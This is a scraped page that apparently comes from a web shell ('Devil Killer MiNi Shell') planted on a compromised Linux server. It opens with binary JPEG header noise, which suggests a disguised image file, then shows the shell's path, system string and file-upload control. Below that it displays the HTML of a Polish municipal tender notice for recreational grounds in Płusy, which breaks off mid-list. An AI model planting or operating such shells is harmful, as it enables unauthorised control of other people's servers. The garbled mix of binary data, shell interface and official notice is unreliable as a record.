JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230330/0015846001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ogólnodostępnych terenów rekreacyjnych w miejscowości Płusy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KSIĘŻPOL</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950369095</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Biłgorajska 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Księżpol</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-415</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">846877419</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">846877432</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@ksiezpol.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ugksiezpol.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ogólnodostępnych terenów rekreacyjnych w miejscowości Płusy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-594129a4-cef7-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00158460</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00012437/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Budowa ogólnodostępnych terenów rekreacyjnych w miejscowości Płusy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzp.ksiezpol.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pzp.ksiezpol.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami:1) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy<br/>użyciu: Platformy Zamówień Publicznych Zamawiającego : https://pzp.ksiezpol.pl 2) Korzystanie z Platformy jest bezpłatne. 3) Instrukcja Użytkownika - korzystania z Platformy Zamówień Publicznych znajduje się na Portalu, w zakładce „Pomoc” pod adresem<br/>https://pzp.ksiezpol.pl/#/help 4) Ogólne zasady korzystania z Platformy: a) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie https://pzp.ksiezpol.pl/#/authentication/login b) Wykonawca aby przystąpić do<br/>postępowania musi założyć konto na Platformie https://pzp.ksiezpol.pl//#/authentication/register gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego;<br/>podaje adres e-mail, otrzymuje link aktywacyjny a następnie ustanawia hasło; 5) Zamawiający, zgodnie z art. 67 Ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2019 r. poz. 2019) określa następujące wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej przy wykorzystaniu Platformy Zakupowej, tj.: a)<br/>stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 10, Mac Os<br/>x 10.4, Linux, lub ich nowsze wersje; c) zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca TLS 1.2 z wyjątkiem Internet Explorer;d) włączona obsługa JavaScript; e) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.; 6) Zamawiający, zgodnie z §11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452) podaje następujące informacje na temat specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych: a) dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB w formatach: .doc, .pdf, .zip, .docx, .xls, .xlsx, .rar, .7zip, .jpg, .jpeg, .png, .txt, .tiff .xades, .sig,b) informacje na temat kodowania i czasu<br/>odbioru danych: - plik załączony przez Wykonawcę na Platformie Zamówień Publicznych Zamawiającego i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;7) Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu platformy Microsoft Azure, który jest synchronizowany ze znacznikiem czasu UTC.2. Ofertę, oświadczenia i dokumenty muszą zostać podpisane przez Wykonawcę przy użyciu kwalifikowanego podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego .1) zalecenia odnoście kwalifikowanego podpisu elektronicznego: a) dla dokumentów w formacie „pdf” zaleca się podpis w formacie PAdES; b) dla dokumentów w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES; 2) zalecenia odnośnie podpisu osobistego: a) dla dokumentów w formacie „pdf” lub „xml” zaleca się podpis wewnętrzny (otoczony);b) dokumenty w formie innej niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub<br/>otaczającym;3) zalecenia odnośnie podpisu zaufanego: a) wielkość dokumentów nie może przekroczyć 10MB, dostępny format podpisu „xml”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 3 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.	Administratorem Pani/Pana danych osobowych jest Wójt Gminy Księżpol ul. Biłgorajska 12, 23-415 Księżpol tel. 84 6877420; fax 84 6877432; e-mail info@ksiezpol.pl;<br/>2.	W sprawach związanych z przetwarzaniem danych osobowych można kontaktować się z Inspektorem ochrony danych osobowych: tel. 604521364; mail: biuro@myszkowiak.pl <br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie przetargu podstawowego oraz w celu archiwizacji i przeprowadzanych kontroli;<br/>4.	Podstawę prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>5.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18-19 oraz 74 -76 ustawy Pzp.<br/>6.	Pani/Pana dane osobowe będą przechowane, zgodnie z art. 78 ust. 1 Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, oraz przez okres wynikający z przepisów szczególnych dotyczących archiwizacji. Okresy te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one uznane, jako najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy).<br/>7.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8.	Posiada Pani/Pan prawo:<br/>1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9.	Nie przysługuje Pani/Panu:<br/>1)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BGK.271.1.7.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest budowa ogólnodostępnego terenu rekreacyjnego w miejscowości Płusy w zakresie:<br/>	przebudowy zbiornika wody;<br/>	wykonania toru rekreacyjnego typu Pumptrack o nawierzchni asfaltowej;<br/>	tor rekreacyjny – odcinek płaski o nawierzchni z kruszywa;<br/>	tyrolka;<br/>	kort do tenisa ziemnego <br/>	plac zabaw;<br/>	wykonanie oświetlenia parkowego. <br/>Charakterystyczne parametry obiektów budowlanych:<br/>1)	Zbiornik wody<br/>a)	parametry techniczne zbiornika wody:<br/>•	powierzchnia zbiornika – 0,1664 ha;<br/>•	pojemność zbiornika – 1 581,00 m3;<br/>•	średnia głębokość zbiornika – 1,00 m;<br/>•	długość zbiornika – 52 m;<br/>•	szerokość zbiornika – 32 m;<br/>•	powierzchnia lustra wody – 1 664,00 m2;<br/>b)	formowanie zbiornika:<br/>•	czasze zbiornika należy uformować w procesie zmniejszania powierzchni zbiornika;<br/>•	dno zbiornika należy oczyścić z zarośli i krzaków, wraz z usunięciem górnej warstwy gruntu o miąższości ~20-30 cm;<br/>•	znaczna część zbiornika zostanie zasypana z wykorzystaniem piasku co najmniej średniego, o wskaźniku różnoziarnistości Cu ≥ 5;<br/>•	skarpy zbiornika należy obsiać trawą na wykonanej warstwie wegetacyjnej z gruntu organicznego, a do czasu ukorzenienia roślinności przewiduje się ich umocnienie z wykorzystaniem geowłókniny, biowłókniny lub mat biodegradowalnych;<br/>•	nachylenie skarp: część odwodna 1:1, część odpowietrzna 1:2;<br/>•	na krawędzi półki skarpowej należy wykonać kiszkę faszynową o wysokości ok. 15 cm;<br/>c)	przepust:<br/>•	przebudowę istniejącego przepustu betonowego o długości ~42,5 m i średnicy DN400 mm pod drogą gminną w zakresie jego przedłużenia rurą PP karbowaną typu ciężkiego SN8 DN500 mm na długości ~14,2 m;<br/>•	istniejący przepust oczyścić, udrożnić i doprowadzić do stanu używalności;<br/>•	rów przy drodze gminnej doprowadzający wodę do przedmiotowego przepustu należy oczyścić i odmulić;<br/>•	należy wykonać nowy przepustu z rur PP karbowanych, typu ciężkiego SN8, o średnicy wewnętrznej fi 500 mm, którego kołnierz o większej średnicy wewnętrznej niż sam przepust pozwala nałożyć rurę przepustową na istniejące rury betonowe;<br/>•	na końcu rury przepustowej należy zamontować prefabrykowaną klapę zwrotną końcową, wykonaną z PE-HD, klapa o wymiarach nominalnych: DN 500 mm, L = 350 mm, H = 640 mm, B = 620 mm. Kąt pochylenia klapy 30o;<br/>•	należy wykonać obudowę wylotu rury przepustowej z kamieni otoczaków układanych na zaprawie cementowej, podbudowę wylotu wykonać na ławę betonową wym. z betonu klasy C16/20 W.<br/>2)	Toru typu Pumptrack:<br/>a)	parametry techniczne toru typu Pumptrack:<br/>•	powierzchnia całkowita – 805,00 m2;<br/>•	podstawa szerokości toru – 2,50 m;<br/>• długość całkowita (zewnętrzna) – 71,60 m;<br/>•	szerokość całkowita (zewnętrzna) – 22,00 m;<br/>b)	konstrukcja toru:<br/>•	warstwa ścieralna gr. 7 cm – masa mineralno-asfaltowej, wykonana w technologii na gorąco,<br/>•	podbudowa gr. 15 cm – kruszywo łamane frakcji 0/31,5 mm,<br/>•	nasyp ziemny zgęszczony do Is=1,0 – zmienna wysokość nasypu,<br/>•	warstwa podłoża wzmocnionego zasypka z kruszywa naturalnego: piasek średni lub gruby, wymagany wskaźnik zagęszczenia Is&gt;0,99 (E2&gt;50 MPa), wskaźnik różnoziarnistości Cu&gt;5; geotkanina poliestrowa,<br/>•	podłoże gruntowe, dogęszczone powierzchniowo do Is&gt;0,99<br/>3)	Tor rekreacyjny odcinek płaski:<br/>a)	parametry techniczne toru płaskiego:<br/>•	powierzchnia całkowita – 354,00 m2;<br/>•	podstawowa szerokość toru – 2,50 m;<br/>•	długość całkowita (zewnętrzna) – 70,60 m;<br/>•	szerokość całkowita (zewnętrzna) – 40,30 m;<br/>b)	konstrukcja toru:<br/>•	nawierzchnia żwirowa gr. 8 cm – grys frakcji 4/8 mm,<br/>•	podbudowa gr. 20 cm – kruszywo łamane frakcji 0/31,5 mm,<br/>•	warstwa odsączając gr. 15 cm – piasek frakcji 0/2 mm,<br/>•	geowłóknina filtracyjno-separacyjna,<br/>•	podłoże gruntowe, dogęszczone powierzchniowo do Is&gt;0,99;<br/>•	obramowanie toru płaskiego z obrzeży betonowych o wym. 30x8 cm, na ławie betonowej z oporem, z wypełnieniem spoin zaprawą cementową. Ława pod obrzeża betonowa z oporem, beton klasy C12/15.<br/>4)	Tyrolka:<br/>a)	parametry techniczne tyrolki:<br/>•	długość użytkowa (dł. kabla) – 50,00 m;<br/>•	długość całkowita (zewnętrzna)	– 52,88 m;<br/>•	szerokość całkowita (zewnętrzna)	– 4,61 m;<br/>•	powierzchnia całkowita – 243,78 m2;<br/>•	wymiary urządzenia – 52,00x3,80x2,70 m( LxWxH);<br/>•	strefa bezpieczeństwa – 53,10x3,80 m (LxW);<br/>•	maksymalna wysokość upadku – 1,00 m;<br/>•	dopuszcza się różnice wymiarów nie większe niż +/- 5%<br/>5)	Kort do tenisa ziemnego:<br/>a)	parametry kortu do tenisa zmiennego:<br/>•	długość netto – 23,77 m;<br/>•	szerokość netto – 10,97 m;<br/>•	powierzchnia netto – 260,76 m2;<br/>•	długość całkowita (zewnętrzna)	– 34,77 m;<br/>•	szerokość całkowita (zewnętrzna)	– 17,07 m;<br/>•	powierzchnia całkowita – 593,52 m2;<br/>b)	parametry techniczna kortu do tenisa ziemnego – trawa syntetyczna:<br/>•	warstwa odsączająca z piasku frakcji 0/2 mm o grubości po zagęszczeniu 15 cm, wykonana i zagęszczona mechanicznie.<br/>•	warstwa konstrukcyjna z kruszywa łamanego (tłucznia) frakcji 0/31,5 mm o grubości po zagęszczeniu 20 cm, wykonana i zagęszczona mechanicznie.<br/>•	warstwa klinująca z kruszywa drobnego frakcji 0/4 mm o grubości po zagęszczeniu 5 cm, wykonana i zagęszczona mechanicznie.<br/>•	pod warstwą odsączającą należy ułożyć geowłókninę filtracyjno-separacyjną<br/>•	obramowanie kortu - obrzeża betonowe o wym. 30x8 cm na ławie betonowej z oporem, z wypełnieniem spoin zaprawą cementową, ława pod obrzeża betonowa z oporem, beton klasy C12/15;<br/>c)	nawierzchnia sportowa kortu do tenisa:<br/>•	warstwa elastyczna podkładowa układana metodą In-situ na boisku;<br/>•	nawierzchnia użytkowa z trawy syntetycznej;<br/>d)	wyposażenie kortu do tenisa ziemnego:<br/>•	słupki tenisowe wykonane z owalnego profilu aluminiowego, mocowane w tulejach osadzonych w podłożu kortu, słupki wyposażone w umieszczone wewnątrz urządzenie naciągowe z zastosowaniem śruby trapezowej i kółka zaczepnego, haki zaczepowe umieszczone na przeciwległym słupku;<br/>•	tuleja montażowa słupka aluminiowego wykonana z rury stalowej, zabezpieczona przed korozją poprzez cynkowanie ogniowe, dekiel maskujący owalną tuleję słupka aluminiowego stalowy;<br/>•	siatka tenisowa polietylenowa w kolorze białym;<br/>•	fundament pod słupki z betonu klasy C12/15, z tulejami stalowymi cynkowanymi ogniowo;<br/>e)	piłkochwyty:<br/>•	słup piłkochwytu z rury stalowej ocynkowanej, malowanej proszkowo, wypora piłkochwytu z rury stalowej ocynkowanej, malowanej proszkowo;<br/>•	fundament pod słupki z betonu klasy C16/20, o wym. 90x90x100 cm;<br/>•	piłkochwyty z siatki polipropylenowej (kolor do uzgodnienia z inwestorem); <br/>6)	Plac zabaw:<br/>a)	parametry techniczne placu zabaw:<br/>•	długość całkowita (zewnętrzna)	– 15,45 m;<br/>•	szerokość całkowita (zewnętrzna)	– 10,50 m;<br/>•	powierzchnia całkowita – 162,23 m2;<br/>b)	wyposażenie podstawowe:<br/>•	sześciokąt sprawnościowy;<br/>•	huśtawka ważka na podstawie metalowej;<br/>•	huśtawka podwójna - niska huśtawka podwójna o konstrukcji wykonanej ze stali zabezpieczonej przed niekorzystnymi warunkami atmosferycznymi;<br/>•	karuzela tarczowa platformowa z siedziskami i centralnie umieszczonym uchwytem umożliwiającym wprowadzenie karuzeli w ruch;<br/>•	linarium mała piramida;<br/>•	bujak samochód;<br/>•	stojak na rowery 4-stanowiskowy, metalowy, ocynkowany ogniowo i malowany proszkowo;<br/>•	ławka stała o konstrukcji metalowej, siedzisko i oparcie drewniane;<br/>•	kosz na śmieci metalowy;<br/>c)	nawierzchnia placu zabaw syntetyczna - płyty prostokątne z granulatu SBR związanego poliuretanem, przeznaczone na powierzchnie placu zabaw;<br/>d)	chodnik wewnętrzny placu zabaw:<br/>•	nawierzchnia chodnika z kostki brukowej betonowej wibroprasowanej szarej Holland gr. 6 cm na podsypce cementowo-piaskowej;<br/>•	warstwa odsączająca z piasku o grubości po zagęszczeniu 15 cm, zagęszczona mechanicznie;<br/>•	obrzeża betonowe o wym. 30x8 cm na ławie betonowej, z wypełnieniem spoin zaprawą cementową.<br/>•	ława pod obrzeża betonowa z oporem, beton klasy C12/15.<br/>7)	Zieleń urządzona – zasadzenie zielni należy wykonać po zakończeniu wszystkich robót budowlanych w miejscach uzgodnionych z Zamawiającym. W ramach zasadzeń przewidziano następujące gatunki roślin:<br/>a)	Klon zwyczajny &#39;Princeton Gold&#39;;<br/>b)	Wiśnia piłkowana &#39;Kanzan&#39;;<br/>c)	Surmia bignoniowa &#39;Nana&#39;;<br/>d)	Klon zwyczajny &#39;Royal Red&#39;;<br/>e)	Krzewuszka cudowna &#39;Pink Princes&#39;;<br/>f)	Kalina japońska &#39;Mariesli&#39;;<br/>g)	Pęcherznica kalinolistna &#39;Diabolo&#39;;<br/>h)	Irga szwedzka;<br/>8)	Wykonanie oświetlenia ogólnodostępnego terenu rekreacyjnego:<br/>a)	budowa linii elektroenergetycznej kablowej nn oświetlenia terenu YAKY 5x16mm2;<br/>b)	montaż latarni i opraw oświetleniowych;<br/>c)	montaż układu sterowania oświetlenia.<br/>9)	Szczegółowy zakres prac (Opis Przedmiotu Zamówienia) został zawarty w dokumentacji technicznej i specyfikacjach technicznych oraz przedmiarach robót uzupełniających dokumentację oraz stanowiących załączniki do SWZ. W kalkulacji ceny oferty wykonawca winien uwzględnić wszystkie wymagania i warunki wymagane do prawidłowego wykonania przedmiotu zamówienia.<br/>2.	Rozwiązania równoważne zostały opisane w SWZ.<br/>3. Określenie wymagań 